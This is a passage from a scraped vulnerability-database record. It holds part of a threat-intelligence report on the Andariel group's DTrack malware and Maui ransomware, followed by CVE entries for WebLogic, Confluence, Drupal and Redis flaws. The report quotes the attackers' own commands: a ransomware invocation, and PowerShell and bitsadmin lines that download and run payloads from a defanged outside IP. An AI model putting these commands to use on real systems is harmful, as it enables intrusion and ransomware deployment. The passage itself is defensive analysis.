Maui ransomware. In this incident, we observe the actors using "-t" and "\\- x" arguments, along with a specific drive path to encrypt:\n \n \n C:\\Windows\\Temp\\temp\\bin\\Maui.exe -t 8 -x E:\n\nIn this case, "-t 8" sets the ransomware thread count to eight, "-x" commands the malware to "self melt", and the "E:" value sets the path (the entire drive in this case) to be encrypted. The ransomware functionality is the same as described in the Stairwell report.\n\nThe malware created two key files to implement file encryption:\n\nRSA private key | C:\\Windows\\Temp\\temp\\bin\\Maui.evd \n---|--- \nRSA public key | C:\\Windows\\Temp\\temp\\bin\\Maui.key \n \n## Similar DTrack malware on different victims\n\nPivoting on the exfiltration information to the adjacent hosts, we discovered additional victims in India. One of these hosts was initially compromised in February 2021. In all likelihood, Andariel stole elevated credentials to deploy this malware within the target organization, but this speculation is based on paths and other artifacts, and we do not have any further details.\n\nMD5 | f2f787868a3064407d79173ac5fc0864 \n---|--- \nSHA1 | 1c4aa2cbe83546892c98508cad9da592089ef777 \nSHA256 | 92adc5ea29491d9245876ba0b2957393633c9998eb47b3ae1344c13a44cd59ae \nLink time | 2021-02-22 05:36:16 \nFile type | PE32 executable (GUI) Intel 80386, for MS Windows \nFile size | 848 KB \n \nThe primary objective of this malware is the same as in the case of the aforementioned victim in Japan, using different login credentials and local IP address to exfiltrate data.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/04144620/Andariel_Deploys_DTrack_and_Maui_Ransomware_01.png>)\n\n**_Windows commands to exfiltrate data_**\n\nFrom the same victim, we discovered additional DTrack malware (MD5 87e3fc08c01841999a8ad8fe25f12fe4) using different login credentials.\n\n## Additional DTrack module and initial infection method\n\nThe ["3Proxy" tool](<https://3proxy.ru/>), likely utilized by the threat actor, was compiled on 2020-09-09 and deployed to the victim on 2020-12-25. Based on this detection and compilation date, we expanded our research scope and discovered an additional DTrack module. This module was compiled 2020-09-16 14:16:21 and detected in early December 2020, having a similar timeline to the 3Proxy tool deployment.\n\nMD5 | cf236bf5b41d26967b1ce04ebbdb4041 \n---|--- \nSHA1 | feb79a5a2bdf0bcf0777ee51782dc50d2901bb91 \nSHA256 | 60425a4d5ee04c8ae09bfe28ca33bf9e76a43f69548b2704956d0875a0f25145 \nLink time | 2020-09-16 14:16:21 \nFile type | PE32 executable (GUI) Intel 80386, for MS Windows \nCompiler | VS2008 build 21022 \nFile size | 136 KB \nFile name | %appdata%\\microsoft\\mmc\\dwem.cert \n \nThis DTrack module is very similar to the EventTracKer module of DTrack, which was previously reported to our Threat Intelligence customers. In one victim system, we discovered that a well-known simple HTTP server, [HFS7](<https://www.rejetto.com/hfs/>), had deployed the malware above. After an unknown exploit was used on a vulnerable HFS server and "whoami" was executed, the Powershell command below was executed to fetch an additional Powershell script from the remote server:\n \n \n C:\\windows\\system32\\WindowsPowershell\\v1.0\\powershell.exe IEX (New-Object Net.WebClient).DownloadString('hxxp://145.232.235[.]222/usr/users/mini.ps1')\n\nThe mini.ps1 script is responsible for downloading and executing the above DTrack malware via bitsadmin.exe:\n \n \n bitsadmin.exe /transfer myJob /download /priority high\n \"hxxp://145.232.235[.]222/usr/users/dwem.cert\" \"%appdata%\\microsoft\\mmc\\dwem.cert\"\n\nThe other victim operated a vulnerable Weblogic server. According to our telemetry, the actor compromised this server via the CVE-2017-10271 exploit. We saw Andariel abuse identical exploits and compromise WebLogic servers in mid-2019, and previously reported this activity to our Threat Intelligence customers. In this case, the exploited server executes the Powershell command to fetch the additional script. The fetched script is capable of downloading a Powershell script from the server we mentioned above (hxxp://145.232.235[.]222/usr/users/mini.ps1). Therefore, we can summarize that the actor abused vulnerable Internet-facing services to deploy their malware at least until the end of 2020.\n\n## Victims\n\nThe July 2022 CISA alert noted that the healthcare and public health sectors had been targeted with the Maui ransomware within the US. However, based on our research, we believe this operation does not target specific industries and that its reach is global. We can confirm that the Japanese housing company was targeted with the Maui ransomware on April 15, 2021. Also, victims from India, Vietnam, and Russia were infected within a similar timeframe by the same DTrack malware as used in the Japanese Maui incident: from the end of 2020 to early 2021.\n\nOur research suggests that the actor is rather opportunistic and could compromise any company around the world, regardless of their line of business, as long as it enjoys good financial standing. It is probable that the actor favors vulnerable Internet-exposed web services. Additionally, the [Andariel deployed ransomware](<https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/>) selectively to make financial profits.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/04144725/Andariel_Deploys_DTrack_and_Maui_Ransomware_02.png>)\n\n## Attribution\n\nAccording to the Kaspersky Threat Attribution Engine (KTAE), the DTrack malware from the victim contains a high degree of code similarity (84%) with previously known DTrack malware.\n\nAlso, we discovered that the DTrack malware (MD5 739812e2ae1327a94e441719b885bd19) employs the same shellcode loader as "Backdoor.Preft" malware (MD5 2f553cba839ca4dab201d3f8154bae2a), [published/reported by Symantec](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/stonefly-north-korea-espionage>) - note that Symantec recently described the Backdoor.Preft malware as "aka Dtrack, Valefor". Apart from the code similarity, the actor used 3Proxy tool (MD5 5bc4b606f4c0f8cd2e6787ae049bf5bb), and that tool was also previously employed by the Andariel/StoneFly/Silent Chollima group (MD5 95247511a611ba3d8581c7c6b8b1a38a). Symantec attributes StoneFly as the North Korean-linked actor behind the DarkSeoul incident.\n\n## Conclusions\n\nBased on the modus operandi of this attack, we conclude that the actor's TTPs behind the Maui ransomware incident is remarkably similar to past Andariel/Stonefly/Silent Chollima activity:\n\n * Using legitimate proxy and tunneling tools after initial infection or deploying them to maintain access, and using Powershell scripts and Bitsadmin to download additional malware;\n * Using exploits to target known but unpatched vulnerable public services, such as WebLogic and HFS;\n * Exclusively deploying DTrack, also known as Preft;\n * Dwell time within target networks can last for months prior to activity;\n * Deploying ransomware on a global scale, demonstrating ongoing financial motivations and scale of interest", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-08-09T10:00:46", "type": "securelist", "title": "Andariel deploys DTrack and Maui ransomware", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2022-08-09T10:00:46", "id": "SECURELIST:B61F1A3C7FBA17501CE779F4E076EB79", "href": "https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "Oracle Corporation WebLogic Server contains a vulnerability that allows for remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-02-10T00:00:00", "type": "cisa_kev", "title": "Oracle Corporation WebLogic Server Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2022-02-10T00:00:00", "id": "CISA-KEV-CVE-2017-10271", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Atlassian Confluence Server The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5 contains an OGNL injection vulnerability which allows an attacker to execute arbitrary code.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Atlassian Confluence Server < 6.13.23, 6.14.0 - 7.12.5 Arbitrary Code Execution", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-26084", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Drupal module configuration vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2018-7600", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Injection vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-10T00:00:00", "type": "cisa_kev", "title": "Oracle WebLogic Server, Injection", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725"], "modified": "2022-01-10T00:00:00", "id": "CISA-KEV-CVE-2019-2725", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Redis is prone to a (Debian-specific) Lua sandbox escape, which could result in remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-28T00:00:00", "type": "cisa_kev", "title": "Debian-specific Redis Server Lua Sandbox Escape Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0543"], "modified": "2022-03-28T00:00:00", "id": "CISA-KEV-CVE-2022-0543", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "symantec": [{"lastseen": "2021-06-08T19:08:30", "description": "### Description\n\nOracle WebLogic Server is prone to a remote security vulnerability in WLS Security. The vulnerability can be exploited over the 'HTTP' protocol. This vulnerability affects the following supported versions: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0, 12.2.1.2.0\n\n### Technologies Affected\n\n * Oracle Weblogic Server 10.3.6.0 \n * Oracle Weblogic Server 12.1.3.0 \n * Oracle Weblogic Server 12.2.1.1 \n * Oracle Weblogic Server 12.2.1.2 \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nFilter access to the affected computer at the network boundary if global access isn't needed. Restricting access to only trusted computers and networks might greatly reduce the likelihood of a successful exploit.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity including unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Modify default ACL settings.** \nImplement database access control to limit the immediate impact of such vulnerabilities on the data and possibly the database itself. Ensure that applications are isolated from one another and from sensitive data through separate user accounts and restrictive ACL configurations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo limit the impact of latent vulnerabilities, configure servers and other applications to run as a nonadministrative user with minimal access rights.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 2, "cvss3": {}, "published": "2017-10-17T00:00:00", "type": "symantec", "title": "Oracle WebLogic Server CVE-2017-10271 Remote Security Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-10271"], "modified": "2017-10-17T00:00:00", "id": "SMNTC-101304", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/101304", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "attackerkb": [{"lastseen": "2022-03-28T17:37:53", "description": "Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).\n\n \n**Recent assessments:** \n \n**wchen-r7** at May 23, 2019 5:44pm UTC reported:\n\nStraight forward and reliable exploitation. No auth required. WebLogic is quite well known and it is also bundled in other products. Should be a pentester\u2019s favorite.\n\n**asoto-r7** at September 12, 2019 6:06pm UTC reported:\n\nStraight forward and reliable exploitation. No auth required. WebLogic is quite well known and it is also bundled in other products. Should be a pentester\u2019s favorite.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-10-19T00:00:00", "type": "attackerkb", "title": "CVE-2017-10271 - Oracle WebLogic Server AsyncResponseService Deserialization Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2021-07-27T00:00:00", "id": "AKB:7992242A-E0F4-4572-BE13-859467611F09", "href": "https://attackerkb.com/topics/KjHcjsGuez/cve-2017-10271---oracle-weblogic-server-asyncresponseservice-deserialization-vulnerability", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-06-17T23:03:20", "description": "In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if \u2018Allow people to sign up to create their account\u2019 is enabled. To check whether this is enabled go to COG > User Management > User Signup Options. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.\n\n \n**Recent assessments:** \n \n**wvu-r7** at September 02, 2021 1:27am UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis>). Thank you to [Jang (**@testanull**)](<https://twitter.com/testanull>) for being a great collaborator. :)\n\n**NinjaOperator** at September 01, 2021 5:38pm UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis>). Thank you to [Jang (**@testanull**)](<https://twitter.com/testanull>) for being a great collaborator. :)\n\n**GhostlaX** at September 04, 2021 1:44am UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis>). Thank you to [Jang (**@testanull**)](<https://twitter.com/testanull>) for being a great collaborator. :)\n\n**Cherylyin** at September 03, 2021 2:03am UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis>). Thank you to [Jang (**@testanull**)](<https://twitter.com/testanull>) for being a great collaborator. :)\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T00:00:00", "type": "attackerkb", "title": "CVE-2021-26084 Confluence Server OGNL injection", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-04T00:00:00", "id": "AKB:83332F26-A0EE-40BA-B796-8EE84ED704BC", "href": "https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-13T05:03:04", "description": "This exploits a Drupal property injection in the Forms API. Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are vulnerable.\n\nDrupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.\n\n \n**Recent assessments:** \n \n**J3rryBl4nks** at March 03, 2020 3:50pm UTC reported:\n\nDue to many public exploits for this flaw this is an incredibly valuable tool for an attacker to have in their arsenal. My favorite variant of this exploit is: <https://github.com/g0tmi1k/Drupalgeddon2>\n\n**busterb** at May 09, 2019 5:57pm UTC reported:\n\nDue to many public exploits for this flaw this is an incredibly valuable tool for an attacker to have in their arsenal. My favorite variant of this exploit is: <https://github.com/g0tmi1k/Drupalgeddon2>\n\n**hrbrmstr** at May 12, 2020 7:54pm UTC reported:\n\nDue to many public exploits for this flaw this is an incredibly valuable tool for an attacker to have in their arsenal. My favorite variant of this exploit is: <https://github.com/g0tmi1k/Drupalgeddon2>\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-03-29T00:00:00", "type": "attackerkb", "title": "Drupalgeddon 2", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2020-09-02T00:00:00", "id": "AKB:3374FB55-2A44-4607-A9C5-265E7DE9B936", "href": "https://attackerkb.com/topics/0gCgI4g4Z2/drupalgeddon-2", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-27T20:35:44", "description": "Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services). Supported versions that are affected are 10.3.6.0.0 and 12.1.3.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).\n\n \n**Recent assessments:** \n \n**asoto-r7** at May 09, 2019 5:57pm UTC reported:\n\nCVE-2019-2725 (aka CNVD-C 2019-48814) exploits an XML deserialization vulnerability in Oracle WebLogic via the AsyncResponseService component. The exploit provides an unauthenticated attacker with remote arbitrary command execution.\n\nAccording to the vendor, Oracle WebLogic Server v10.3.6.0 and 12.1.3.0 are affected.\n\nIn addition to a public proof-of-concept, a Metasploit module has been published to allow for exploitation of Windows, Linux, and Unix hosts. It has been successfully tested on v10.3.6.0, and exploitation failed against 12.2.1.2.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-04-26T00:00:00", "type": "attackerkb", "title": "CVE-2019-2725", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725"], "modified": "2021-07-22T00:00:00", "id": "AKB:9B4E2AEC-697D-42F0-9FED-B010FB1F82ED", "href": "https://attackerkb.com/topics/GmCoX0fF2M/cve-2019-2725", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-27T23:35:15", "description": "It was discovered, that redis, a persistent key-value database, due to a packaging issue, is prone to a (Debian-specific) Lua sandbox escape, which could result in remote code execution.\n\n \n**Recent assessments:** \n \n**NinjaOperator** at March 25, 2022 8:04pm UTC reported:\n\nMuhstik Gang has been seen exploiting this vulnerability to target Redis servers \nPoc is publicly available <https://github.com/aodsec/CVE-2022-0543>\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-18T00:00:00", "type": "attackerkb", "title": "CVE-2022-0543", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0543"], "modified": "2022-04-27T00:00:00", "id": "AKB:3C5CF154-6882-4093-86F8-445BF9DCEF8A", "href": "https://attackerkb.com/topics/wyA1c1HIC8/cve-2022-0543", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "hackerone": [{"lastseen": "2019-07-02T07:43:34", "bounty": 0.0, 